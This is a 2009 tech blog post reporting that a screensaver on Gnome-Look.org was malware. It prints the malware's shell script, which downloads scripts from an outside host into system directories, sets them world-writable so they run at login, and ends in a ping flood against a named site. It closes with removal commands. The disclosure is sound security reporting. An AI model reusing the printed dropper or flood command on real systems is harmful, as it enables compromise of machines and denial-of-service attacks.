Ubuntu: Malware in Screensaver from Gnome-Look.org
By on December 10th, 2009

A desktop screensaver available from Gnome-Look.org was reported to be a malware, which downloads an unauthorized script. This script is believed to enable a possible DDoS attack.   The screensaver has been immediately removed from the website after the malware was confirmed at this thread at Ubuntu forums.

The malware posing as a screensaver has a script:

#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit

The ultimate result of this command is:

ping -s 65507 www.mmowned.com

This seems harmless. Also, the site in question [ www.mmowned.com ] advertises protection against DOS attacks. This can be a good prank revenge on the company or, this can be a part of something big by making all these affected computers into bots.

If you have already installed the screensaver, remove it and protect your computer by issuing the commands:

sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash
and
sudo dpkg -r app5552

[ Via OMG! UBUNTU! ]

Author: Chinmoy Kanjilal Google Profile for Chinmoy Kanjilal
Chinmoy Kanjilal is a FOSS enthusiast and evangelist. He is passionate about Android. Security exploits turn him on and he loves to tinker with computer networks. He rants occasionally at Techarraz.com. You can connect with him on Twitter @ckandroid.

Chinmoy Kanjilal has written and can be contacted at chinmoy@techie-buzz.com.

Leave a Reply

Name (required)

Website (optional)

 
 
Copyright 2006-2012 Techie Buzz. All Rights Reserved. Our content may not be reproduced on other websites. Content Delivery by MaxCDN